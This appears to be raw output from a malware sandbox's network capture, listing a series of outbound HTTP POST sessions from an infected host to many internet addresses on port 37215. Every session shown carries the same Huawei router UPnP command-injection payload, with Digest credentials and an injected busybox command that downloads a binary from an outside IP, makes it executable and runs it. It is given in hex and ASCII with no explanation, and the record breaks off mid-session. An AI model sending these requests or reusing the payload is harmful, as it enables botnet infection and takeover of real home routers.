                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1993192.168.2.1538672102.231.109.19237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.099674940 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1994192.168.2.1548292157.71.243.12937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.099677086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1995192.168.2.155837245.255.95.23137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.099679947 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1996192.168.2.1539332190.144.148.25137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.100063086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1997192.168.2.155882478.231.247.23737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.100805044 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1998192.168.2.153477037.182.90.7737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.100828886 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1999192.168.2.1552272156.230.7.6537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.100894928 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2000192.168.2.154721234.207.31.10137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.100991011 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2001192.168.2.1534198186.153.2.17937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.101000071 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2002192.168.2.1555356156.138.248.3637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.101062059 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2003192.168.2.155752094.243.66.20437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.101948023 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
